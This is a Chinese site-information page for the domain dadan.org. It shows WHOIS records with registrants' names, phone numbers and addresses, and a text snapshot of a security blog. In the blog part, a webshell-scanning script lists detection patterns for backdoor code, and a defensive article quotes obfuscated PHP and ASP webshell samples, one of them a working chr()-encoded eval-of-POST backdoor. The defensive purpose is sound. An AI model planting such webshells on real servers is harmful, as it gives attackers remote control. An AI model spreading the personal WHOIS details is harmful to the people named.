网站综合信息 www.dadan.org
    • 标题:
    • 大胆's BLOG 
    • 关键字:
    •  
    • 描述:
    •  
    • 域名信息
    • 域名年龄:11年11个月5天  注册日期:2012年05月30日  到期时间:
      邮箱:hackdadan  电话:+86.15888857500
      注册商:Hangzhou AiMing Network Co., LTD (R1896-LROR) 
    • 服务器空间
    • IP:106.184.2.202
      地址:日本 东京都千代田区KDDI通信公司
    • 备案信息
    • 备案号: 
    网站收录SEO数据
    • 搜索引擎
    • 收录量
    • 反向链接
    • 其他
    • 百度
    • 68  
    • 214  
    • 快照:2013-10-31  
    • Google
    • 90  
    • 0  
    • pr:4  
    • 雅虎
    • 0  
    •  
    •  
    • 搜搜
    • 0  
    •  
    •  
    • 搜狗
    • 0  
    •  
    • 评级:0/10  
    • 360搜索
    • 0  
    •  
    •  
    域名流量Alexa排名
    •  
    • 一周平均
    • 一个月平均
    • 三个月平均
    • Alexa全球排名
    • -  
    • 平均日IP
    • 日总PV
    • 人均PV(PV/IP比例)
    • 反向链接
    • dmoz目录收录
    • -  
    • 流量走势图
    域名注册Whois信息

    dadan.org

    域名年龄: 11年11个月5天
    注册时间: 2012-05-30
    注 册 商: Hangzhou AiMing Network Co., LTD (R1896-LROR)
    注册邮箱: hackdadan
    联系电话: +86.15888857500

    获取时间: 2014年03月17日 01:54:19
    Domain Name:DADAN.ORG
    Domain ID: D165691340-LROR
    Creation Date: 2012-05-30T08:09:48Z
    Updated Date: 2013-05-06T03:47:30Z
    Registry Expiry Date: 2014-05-30T08:09:48Z
    Sponsoring Registrar:Hangzhou AiMing Network Co., LTD (R1896-LROR)
    Sponsoring Registrar IANA ID: 1555
    WHOIS Server:
    Referral URL:
    Domain Status: ok
    Registrant ID:22cn120530imnejz
    Registrant Name:dangxu
    Registrant Organization:dangxu
    Registrant Street: hangzhoushixihuquxidoumenlutiantangruanjianyuan
    Registrant City:hangzhou
    Registrant State/Province:zhejiang
    Registrant Postal Code:310012
    Registrant Country:CN
    Registrant Phone:+86.15888857500
    Registrant Phone Ext:
    Registrant Fax: +86.057187859200
    Registrant Fax Ext:
    Registrant Email:hackdadan
    Admin ID:22-40221-006508
    Admin Name:sunyulin
    Admin Organization:sunyulin
    Admin Street: zhejianghangzhouxihuqu
    Admin City:hangzhou
    Admin State/Province:zhejiang
    Admin Postal Code:312001
    Admin Country:CN
    Admin Phone:+86.15990181044
    Admin Phone Ext:
    Admin Fax: +86.057131200101
    Admin Fax Ext:
    Admin Email:ylbaihe
    Admin ID:22cn120530imnejz
    Admin Name:dangxu
    Admin Organization:dangxu
    Admin Street: hangzhoushixihuquxidoumenlutiantangruanjianyuan
    Admin City:hangzhou
    Admin State/Province:zhejiang
    Admin Postal Code:310012
    Admin Country:CN
    Admin Phone:+86.15888857500
    Admin Phone Ext:
    Admin Fax: +86.057187859200
    Admin Fax Ext:
    Admin Email:hackdadan
    Tech ID:22-40221-006508
    Tech Name:sunyulin
    Tech Organization:sunyulin
    Tech Street: zhejianghangzhouxihuqu
    Tech City:hangzhou
    Tech State/Province:zhejiang
    Tech Postal Code:312001
    Tech Country:CN
    Tech Phone:+86.15990181044
    Tech Phone Ext:
    Tech Fax: +86.057131200101
    Tech Fax Ext:
    Tech Email:ylbaihe
    Tech ID:22cn120530imnejz
    Tech Name:dangxu
    Tech Organization:dangxu
    Tech Street: hangzhoushixihuquxidoumenlutiantangruanjianyuan
    Tech City:hangzhou
    Tech State/Province:zhejiang
    Tech Postal Code:310012
    Tech Country:CN
    Tech Phone:+86.15888857500
    Tech Phone Ext:
    Tech Fax: +86.057187859200
    Tech Fax Ext:
    Tech Email:hackdadan
    Name Server:F1G1NS1.DNSPOD.NET
    Name Server:F1G1NS2.DNSPOD.NET
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    Name Server:
    DNSSEC:Unsigned

    Access to .ORG WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Public Interest Registry registry database. The data in this record is provided by Public Interest Registry for informational purposes only, and Public Interest Registry does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Public Interest Registry reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
    同IP网站(同服务器)
  • 106.184.2.202 (日本 东京都千代田区KDDI通信公司)
  • 大胆's BLOG www.dadan.org
  • 其他后缀域名
    • 顶级域名
    • 相关信息
    网站首页快照(纯文字版)
    抓取时间:2015年09月06日 18:43:51
    网址:http://www.dadan.org/
    标题:大胆's BLOG
    关键字:
    描述:
    主体:
    大胆's BLOG大胆博客点滴记录,持之以恒首页个人原创代码审计杂七杂八网络安全资源分享nmap的gui版本Zenmap 5.50版本下载备份2013年10月31日大胆没有评论工作中试遍了nmap5.50以上的版本,扫描中总会报C++错误结束进程,都不能用,用来用去就是nmap5.50 版本最稳定。存一份Zenmap 5.50下载备用,与诸苦逼安全君共勉。http://www.400gb.com/file/33519602分类: 资源分享标签: Nmap, ZenmapRTL2832U+R820T电视棒windows下安装sdr# 以及搭建ADS-B使用VirtualRadar看飞机的教程2013年7月20日大胆2 条评论本文中提到的软件我会打包给出下载地址 http://www.400gb.com/file/75231710(包涵文中所有工具、驱动最新版及所需的.net3.5sp1环境)。这篇文章是我根据网上的教程和自己的经验修改的详细版本,为了方便入门新手。先来说说RTL2832U+R820T在windows下安装sdr#的方法。首先科普下sdr#。sdr#简单通俗来说就是一款可以支持RTL2832U+R820T接受调频广播的工具,可以让RTL2832U+R820T电视棒当成调频收音机来使用。类似的工具还有很多例如hdsdr等等。1:首先插入电视棒安装驱动,注意这个驱动不是光盘里的,而是 Zadig 驱动。win7系统不要选择自动安装。要手动安装。驱动的下载地址是http://sourceforge.net/projects/libwdi/files/zadig/ 注意XP是单独的驱动,win7下载普通版本的即可。2:运行zading,单击 options,选择 list all devices ,在下拉列表里选择你的电视棒,绿色箭头右边默认 winusb即可 ,然后单击 instatll driver 即可。(这里要注意检查驱动是否安装成功)阅读全文…分类: 个人原创, 杂七杂八, 资源分享标签: ADS-B, RTL2832U+R820T, sdr, VirtualRadar, 电视棒python版webshell查杀2013年7月16日大胆没有评论#!/usr/bin/python# -*- coding: utf-8 -*-#By:Seay#blog:www.cnseay.comimport osimport sysimport rerulelist = ['(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))','(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))','eval\(base64_decode\(','(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))','(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))','(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))','(wscript\.shell)','(gethostbyname\()','(cmd\.exe)','(shell\.application)','(documents\s+and\s+settings)','(system32)','(serv-u)','(提权)','(phpspy)','(后门)','(webshell)','(Program\s+Files)']def Scan(path):for root,dirs,files in os.walk(path):for filespath in files:isover = Falseif '.' in filespath:ext = filespath[(filespath.rindex('.')+1):]if ext=='php':file= open(os.path.join(root,filespath))filestr = file.read()file.close()for rule in rulelist:result = re.compile(rule).findall(filestr)if result:print '文件:'+os.path.join(root,filespath)print '恶意代码:'+str(result[0])print '\n\n'breakif os.path.lexists(sys.argv[1]):print('\n\n开始扫描:'+sys.argv[1])print('               可疑文件                 ')print('########################################')Scan(sys.argv[1])print('提示:扫描完成-- O(∩_∩)O哈哈~')else:print '提示:指定的扫描目录不存在---  我靠( \'o′)!!凸'分类: 资源分享标签: python, webshell查杀企业web安全之webshell防控浅谈2013年7月15日大胆没有评论     根据我片面的工作经验分析,目前企业遇到的入侵还是以web为入口的居多。其中webshell依然是常见的提权及渗透通道。     下面我仅用自己的一点片面经验谈谈如何针对webshell做出安全防控工作。     通常情况下,我们会依靠各种脚本和工具来查杀webshell,但是随着webshell的变异加密等多样化的变形方式的公布,传统的关键字对比查杀模式就出来了,大量误报以及漏报的问题。      例如如下现在流行的几款变异小马:exp1:<script language=php>$_1=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);@$_1(chr(64).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(97).chr(93).chr(41).chr(59));</script>exp2:<%On Error Resume NextSet f = Server.CreateObject("ADODB.Stream")f.Type = 2f.mode = 3f.Charset = "gb2312"f.openf.WriteText "<"&Chr("37")&StrReverse(Request("cq3h63"))&Chr("37")&"

    © 2010 - 2020 网站综合信息查询 同IP网站查询 相关类似网站查询 网站备案查询网站地图 最新查询 最近更新 优秀网站 热门网站 全部网站 同IP查询 备案查询

    2024-04-27 08:19, Process in 0.0181 second.